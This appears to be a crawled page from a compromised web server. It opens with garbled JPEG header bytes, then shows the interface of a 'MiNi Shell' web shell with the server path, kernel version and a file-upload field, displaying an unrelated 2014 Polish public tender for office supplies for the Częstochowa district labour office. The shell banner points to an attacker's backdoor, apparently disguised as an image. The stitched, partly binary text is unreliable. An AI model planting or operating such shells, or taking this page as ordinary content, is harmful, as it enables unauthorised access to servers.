JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/128145-N-2014.html

<p class="kh_header"><b>Częstochowa: Przetarg nieograniczony na zakup i dostawę materiałów biurowych dla Powiatowego Urzędu Pracy w Częstochowie</b><br>
<b>Numer ogłoszenia: 128145 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Częstochowie , ul. Szymanowskiego 15, 42-200 Częstochowa, woj. śląskie, tel. 034 3706100 w. 186, faks 034 3243130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zakup i dostawę materiałów biurowych dla Powiatowego Urzędu Pracy w Częstochowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 
1. Ołówek - twardość wkładów: HB - grubość wkładu: 0,5 mm - bez gumki 120 
2. Gumka - miękka kauczukowa -przeznaczona do ścierania śladów po ołówkach miękkich -  wymiary min. 50x20 mm biała 40 
3. Temperówka -metalowa -w kształcie klina -profilowana obudowa wykonana  techniką frezowania z twardego stopu magnezu - ostrze precyzyjnie połączone z obudową zapewniające idealnie centralne położenie ołówka podczas temperowania model pojedynczy posiadający profilowane rowki, ułatwiające trzymanie 30 
4. Mazak - kolor czerwony 20
5. Mazak	- kolor zielony 20 
6. Mazak	- kolor czarny 20 
7. Marker -do CD-wodoodporny tusz w kolorze czarnym -grubość linii pisania 0,5 mm. 9 
8. Marker-wodoodporny tusz -w kolorze czarnym -do pisania po różnych powierzchniach -grubość linii pisania 1 mm 10 
9. Marker	-olejowy -grubość linii pisania 1,2 mm -biały -fibrowa końcówka 1mm szybkoschnący, wodoodporny tusz olejny-do zastosowania na wszystkich powierzchniach, do opisywania różnych przedmiotów, nawet w trudnych warunkach warsztatowych 5 
10. Cienkopis - grubość linii pisania 0,4 mm -tusz na bazie wody -fibrowa końcówka oprawiona w metal -wentylowana skuwka -w kolorach: Czerwony 50 szt. Zielony 40 szt. Czarne 60szt. 150 
11. Zakreślacz -Zakreślacze ze ściętą końcówką, -w czarnej obudowie, grubość linii 1-5,2 mm, -z zatyczką w kolorze tuszu, -pozostawia wyraźny i trwały ślad na faksach i kserokopiach, - w kolorach:	zielony 30 szt. pomarańczowy 30 szt. żółty 30 szt. 90
12. Wkład do długopisu -plastikowy -popularny wkład wielkopojemny do długopisu 
kolor niebieski -długość ok. 11 cm wraz z końcówką piszącą 150 
13. Długopis -marki ZENITH lub równoważny na wkład typu ZENITH. -automatyczny mechanizm włączający wkład - wymienny wkład - średnicę kulki 0,8 mm -obudowę z tworzywa  sztucznego - wykończenie niklowane lub metalowe (klips, okuwka, obrączka) - szerokość linii pisania: 0,6-0,7 mm - kolor niebieski 100 
14. Wkład do długopisu -wkład wielkopojemny do długopisu wymienionego w pkt 12 kolor niebieski 200
15. Wkład do długopisu -wkład wielkopojemny do długopisu wymienionego w pkt 12 
kolor czarny 40 
16. Długopis ze sprężynką -długopis połączony rozciągliwą do 1m sprężynką z samoprzylepną podstawką, utrzymującą długopis w pozycji pionowej
kolor wkładu niebieski 80 
17. Długopis biurowy -długopis biurowy-w transparentnej obudowie pozwalającej na kontrolę ilości tuszu we wkładzie - ergonomiczny uchwyt - szczelna zatyczka zapobiega wysychaniu tuszu - grubość linii pisania 1  mm -kolor niebieski 300 
18. Długopis biurowy -długopis biurowy w transparentnej obudowie pozwalającej na kontrolę ilości tuszu we wkładzie -ergonomiczny uchwyt -szczelna zatyczka zapobiega wysychaniu tuszu -grubość linii pisania 0,7 mm -kolor czerwony 30 
19. Korektor-korektor w płynie -na bazie rozpuszczalnika -min.20 ml. -dobrze kryjący -w pędzelku - szybko zasychający 70 
20. Zszywki - 24/6 op. -opakowanie po1000 szt. 300 
21. Zszywki -NO.10 - opakowanie po 1000 szt 10 
22. Zszywki -26/6 op. - opakowanie po 1000 szt. 30 
23. Zszywki -23/13 op. - opakowanie po 1000 szt. 20 
24. Zszywacz  biurowy -zszywacz  biurowy -metalowy -na zszywki 24/6 zszywający min 20 kartek -poj. magazynka min 100 zszywek 15 
25. Zszywacz -duży metalowy zszywacz biurowy -długa dźwignia zwiększająca siłę   nacisku umożliwiająca zszywanie do 100 kartek -możliwość używania nietypowych zszywek do zszywania grubych plików dokumentów - podziałka ułatwiająca precyzyjne określenie miejsca zszywania, -tabela ułatwiająca dobranie wielkości zszywki do ilości zszywanych kartek, na zszywki 23/6 do 23/13. 1 
26. Dziurkacz biurowy -dziurkacz biurowy -w całości wykonany z metalu dziurkuje min. 20 kartek -posiada ogranicznik formatu 15 
27. Spinacze -spinacze metalowe -okrągłe 28 mm -opak. 100 szt. 150
28. Spinacze -spinacze metalowe -okrągłe 50 mm -opak.100 szt. 50 
29. Tusz do pieczątek -uniwersalny do pieczątek na kołku i automatycznych tusz do pieczątek na bazie wody i gliceryny - pojemność  30 ml -  w kolorze: czerwony 60 szt. czarny 10szt. łącznie 70 
30. Poduszka do stempli -poduszka do stempli 7 x 11 cm -nasączona -czerwona 15 31. Magnesy -magnesy do tablic magnetycznych -22 mm -opakowanie po 12 szt 10 op. 
32. Sznurek -sznurek, nici lniane , dratwa - waga 50dkg 30 
33. Klej -klej  kulkowy -bezbarwny -mocno wiążący -do papieru, tektury 50 
34. Taśma -taśma biurowa -przezroczysta - pokryta klejem akrylowym - wymiary18 mm x 30 m 60 
35. Taśma -taśmy wykonane z folii odpornej na rozciąganie i zrywanie zastosowanie kauczukowego kleju daje gwarancje klejenia zarówno w wysokich, jak i niskich temperaturach -rozmiar 48 mm x 60 m 5 
36. Taśma - taśma odklejana Scotch Magic- może zastepować gęsią skórkę; 
można po niej pisać; -po naklejeniu staje się niewidoczna; -odkleja się od wszystkich powierzchni;- taśma w rozmiarze 19 mm x 33 m. 3
37. Okładki do bindowania -okładki do bindowania - kolor zielony -format A-4
opakowanie 100szt. -wykonane z  kartonu laminowanego folia -grubość 250g/m2 2 op.
38. Okładki do bindowania -okładki do bindowania wykonane z folii przezroczystej 
grubość 0,2 mm - kolor : bezbarwny -format A-4 - opakowanie 100szt. 2 op.
39. Grzbiety plastikowe do bindowania	-grzbiety plastikowe do bindowania 
opakowanie 50 szt. -kolor zielony -średnica 22 mm -oprawa do 210 kartek 10 op.
40. Grzbiety plastikowe do bindowania	-grzbiety plastikowe do bindowania
opakowanie 100 szt. -kolor zielony -średnica 16 mm -oprawa do   145 kartek 6 op.
41. Grzbiety  zaciskowe -grzbiety wsuwane pozwalające na oprawę dokumentów  A4 -opakowanie 25 szt. -kolor zielony -średnica 12 mm - pojemność  do 150 kartek
zaokrąglone krawędzie ułatwiają nasuwanie grzbietu na dokument - specjalny system utrzymujący kartki w miejscu 1 op.
42. Grzbiety zaciskowe -grzbiety wsuwane pozwalające na oprawę dokumentów A4
opakowanie 50 szt. -kolor zielony -średnica 6 mm - pojemność  do 150 kartek
zaokrąglone krawędzie ułatwiają nasuwanie grzbietu na dokument
specjalny system utrzymujący kartki w miejscu 1 op.
43. Koszulki -koszulki przeźroczyste do segregatora A-4 -opakowanie 100 szt. w folii - 50 mic 40 op.
44. Ofertówka -ofertówka  przezroczysta sztywna - folia twarda 0,20mm
format A4 - otwierana od góry -wycięcie na palec ułatwiające wyjmowanie dokumentów - opakowanie 25 szt. 250 szt. (10 op.)
45. Karton ozdobny -karton ozdobny przeznaczony do korespondencji biznesowej tj. jako papier firmowy, do wysyłkek reklamowych, ofert lub umowów handlowych 
struktura: płótno -kolor: kremowy -format: A4 -gramatura: 246 g/m2
ilość w opakowaniu: 25 arkuszy 4 op.
46. Papier kredowy	-papier kredowy -format A4 -błyszczący 115 g/m2 
ilość w opakowaniu: 50 arkuszy 3 op.
47. Karton ozdobny -elegancki tłoczony metalizowany karton do przygotowania zaproszeń, wizytówek, certyfikatów, dyplomów, -gramatura 220g/m2 
polecany do kolorowych drukarek laserowych -drobne tłoczenie z połyskiem, 
kolor kremowy -opakowanie 20 ark. - format A4 1op.
48. Papier ksero A4 - papier do kserokopiarek  i   drukarek - papier uniwersalny 
klasy  B - format papieru: A4 - gramatura papieru: nie  mniejsza niż 80g/m2 
białość papieru: nie mniejsza niż CIE 161 -w ryzach minimum 500 szt. 30 ryz
49. Teczka do podpisu -okładka twarda, -oprawiona w okleinę powleczoną PVC,
grzbiet kryty, -oklejana z gąbką, - grzbiet harmonijka,
blok z kartonu barwionego; -łączenie okładki z blokiem wzmocnione nitami;
zawiera 10 kart z dwoma otworami -kolor: granatowy, zielony, czerwony 3
50. Teczka lakierowana z gumką - wykonana z kartonu o gramaturze 300 g/m2
gładka, lakierowana - na dokumenty w formacie A4 - 3 wewnętrzne skrzydła, gumka chroni zawartość przed wysunięciem - rozmiar: 232 x 320 mm
kolor: zielony, żółty, niebieski 20
51. Segregator -segregator oklejony na zewnątrz poliolefiną, wewnątrz pokryty szarym papierem -dwustronna, wymienna etykieta -na grzbiecie otwór na palec
na dolnych krawędziach metalowe okucia - dwa otwory na przedniej okładce
szerokość grzbietu 70 mm -w kolorach: zielony, granatowy, bordowy, czarny.
200 /po 50 sztuk z każdego koloru/
52. Segregator -segregator oklejony na zewnątrz poliolefiną, wewnątrz pokryty szarym papierem -dwustronna, wymienna etykieta -na grzbiecie otwór na palec
na dolnych krawędziach metalowe okucia - dwa otwory na przedniej okładce
szerokość grzbietu 50 mm -w kolorach: zielony, granatowy, bordowy, czarny.
65
53. Segregator -segregator oklejony na zewnątrz poliolefiną, wewnątrz pokryty szarym papierem -dwustronna, wymienna etykieta -na grzbiecie otwór na palec
na dolnych krawędziach metalowe okucia - dwa otwory na przedniej okładce
szerokość grzbietu 35 mm -w kolorach: zielony, granatowy, bordowy,czarny.
15
54. Skoroszyt -skoroszyt zawieszany do segregatora -format A4 -przednia okładka przezroczysta, tylna kolorowa -wykonany z sztywnego PCV -wyposażony w papierowy, wysuwany pasek do opisu -zaokrąglone rogi obu okładek 
wyposażony w boczną perforację, co umożliwia wpięcie do segregatora z dowolnym ringiem -pakowany po 10 sztuk -w kolorze zielonym, granatowym	4 op.
55. Skoroszyt -skoroszyt zawieszkowy pełny; - wykonany z białej tektury
format A4 -pakowany po 50 sztuk 300
56. Skorowidz -skorowidz w twardej, wytrzymałej i lakierowanej oprawie, szyty
wyposażony w tłoczony indeks -liniatura: kratka -96 kartek - format A5 50
57. Skorowidz -skorowidz w twardej, wytrzymałej i lakierowanej oprawie, szyty
wyposażony w tłoczony indeks -liniatura: kratka -96 kartek -format A4 35
58. Zeszyt -zeszyt w twardej, wytrzymałej i lakierowanej oprawie, szyty
liniatura: kratka -96 kartek -format A4 70
59. Zeszyt -zeszyt w twardej, wytrzymałej i lakierowanej oprawie, szyty
liniatura: kratka -96 kartek -format A5 50
60. Blok biurowy -Blok biurowy -kratka - format A5 -100 kartek 20
61. Blok biurowy -Blok biurowy -kratka - format A4 -100 kartek 20
62. Separator -separator kartonowy - przeznaczony do segregowania dokumentów w segregatorze -wykonane z kartonu -opakowanie 100 arkuszy -przekładki z kartonu 160g/m2 -kolor mix. -wymiary separatora 240mm x 105mm 	1 op.
63. Przekładki -przekładki kartonowe w 6 kolorach -do segregatora A4
gramatura: 160 g	2 op.
64. Kalkulator -12 pozycyjny. -Podwójne zasilanie. -Wyświetlacz o regulowanym kącie nachylenia. -Suma końcowa GT. -Klawisz cofania. -Wymiary: 200x155x27mm. 1
65. Kalkulator -12 pozycyjny -podwójne zasilanie -obliczanie % i pierwiastków
suma końca GT -klawisz cofania -plastikowe przyciski -wymiary: 130x103x32mm
2
66. Tablica korkowa -powierzchnia korkowa -wytrzymała drewniana rama
możliwość zawieszenia w pionie lub poziomie -w zestawie uchwyt mocujący
wymiary: 60 x 70 cm -grubość tablicy: 19 mm -grubość korka: 1 mm
grubość podkładki (płyty pilśniowej): 7 mm 2
67. Nożyczki -satynowe ostrze wykonane ze stali nierdzewnej
ergonomiczna wyprofilowana rękojeść wykonana z niełamliwego plastiku -długość 21 cm 5
68. Linijka -linijka plastikowa -wykonane z wytrzymałego, przezroczystego tworzywa sztucznego - długość 20 cm -trwałe, nieścieralne podziałki
zaokrąglane rogi 10
69. Koperta bąbelkowa -Koperta CD - wymiary 180x165 - papier o wysokiej jakości 80g - 90g -folia bąbelkowa (polietylenowa LDPE) o średnicy bąbla 8 mm, wysokości bąbla max 5 mm i gramaturze 50 g/m2 -pasek samoklejący silikonowy o gramaturze 40 g/m2 , po którego zerwaniu uwidacznia się pasek mocnego kleju -koperta sklejana na 3 brzegach (z 3 stron - boki i dno kopert) 100
70. Bęben do faxu	-bęben do faxu PANASONIC KX-FL 613  lub zamiennik w pełni kompatybilny z ww. urządzeniem -wydajność 10.000 stron 3
71. Bęben do drukarki -bęben do drukarki BROTHER HL-4570CDW  lub zamiennik w pełni kompatybilny z ww. urządzeniem -Wydajność: 25 000 stron A4 przy 5% pokryciu 1
72. Bęben do drukarki - bęben do drukarki HP color LJ 2550 L lub zamiennik w pełni kompatybilny z ww. urządzeniem -Wydajność: 20 000 stron A4 1
73. Toner -toner KX-FA 83 do faxu Panasonic KX-FL613 lub zamiennik w pełni kompatybilny z ww. urządzeniem 10
74. Toner - toner do kserokopiarki CANON NP 6512 lub zamiennik w pełni kompatybilny z ww. Urządzeniem -wydajność 5000 str. 3
75. Toner - toner do kserokopiarki Toshiba T2320E lub zamiennik w pełni kompatybilny z ww. Urządzeniem -wydajność 22 000 str.	2
76. Toner - toner do kserokopiarki KYOCERA TASKALFA 420i TK lub zamiennik w pełni kompatybilny z ww. Urządzeniem - wydajność średnio 34000 stron A4 przy 5% pokryciu 3
CZĘŚĆ II
1. Niszczarka -poziom bezpieczeństwa DIN 4 -rozmiar ścinka 2 x 12mm -podajnik automat. minimum 17 kartek/1 CD; -cięcie zszywek, spinaczy, płyt CD, DVD, kart plastikowych -pojemność kosza 35 l. -szerokość wejścia 220 mm -funkcja ręcznego cofania -zabezpieczenie przed przegrzaniem silnika -czujnik wejścia (fotokomórka)
sygnał dźwiękowy w momencie przepełnienia kosza (po 15 sekundach załącza się alarm) -automatyczne zatrzymanie w przypadku przepełnienia kosza - wymiary: 450x390x656 2
CZĘŚĆ III
1. Papier ksero A4 - papier do kserokopiarek i drukarek - papier uniwersalny 
klasy  B - format papieru: A4 - gramatura papieru: nie mniejsza niż 80g/m2 
białość papieru: nie mniejsza niż CIE 161-w ryzach minimum 500 szt. 1000 ryz
2. Koperty listowe - koperty samoklejące - bez okienka - format: C6 -rozmiar 114x162 mm - kolor: biały - opakowanie 1000 szt. 80 
3. Skoroszyt zwykły -kartonowy - format A4 -kolor: biały - gramatura 250 g/m2
wewnątrz metalowy wąs -opakowanie zbiorcze 50 szt. 5000
4. Koperty listowe - koperty samoklejące HK - bez okienka - format: C4 - kolor: biały -rozmiar 229x324 mm - papier offset 90g/m2 - opakowanie 250 szt. 15 op.
5. Koperty listowe - koperty samoklejące HK - bez okienka - format: C4 - kolor: brązowy -rozmiar 229x324 mm - papier offset 90g/m2 - opakowanie 250 szt.	10 op.
6. Koperty listowe	- koperty samoklejące HK - bez okienka - format: C5 - kolor: brązowy -rozmiar 162x229 mm - gramatura  80g/m2 - opakowanie 500 szt. 4 op.
7. Koperty listowe -koperty samoklejące DL (SK)-z okienkiem 45x90 mm - kolor: biały -rozmiar 110x220 mm - gramatura 80 g/m2 - opakowanie 1000 szt. 21 op.
8. Teczki wiązane -klasyczna teczka do przechowywania i archiwizowania dokumentów w formacie A4 - teczka zapinana tasiemką - posiada 3 szerokie klapy   wewnętrzne zabezpieczające dokumenty przed  wypadnięciem -gramatura 300g/m2 - wykonana z białego kartonu -opakowanie zbiorcze 50 szt. 13 000 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.42-8, 30.12.51.20-8, 30.12.43.00-7, 30.19.14.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku - dotyczy każdej części zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku - dotyczy każdej części zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku - dotyczy każdej części zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku - dotyczy każdej części zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku - dotyczy każdej części zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty wskazane w treści Oferty cenowej wraz z opisem przedmiotu zamówienia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty i Oferta cenowa wraz z opisem przedmiotu zamówienia stanowiące załącznik nr 1 i 2 do SIWZ.
2. Oryginalne pełnomocnictwo (ewentualnie poświadczone notarialnie) potwierdzające uprawnienie osób podpisujących ofertę, jeżeli uprawnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy lub z przepisów prawa.
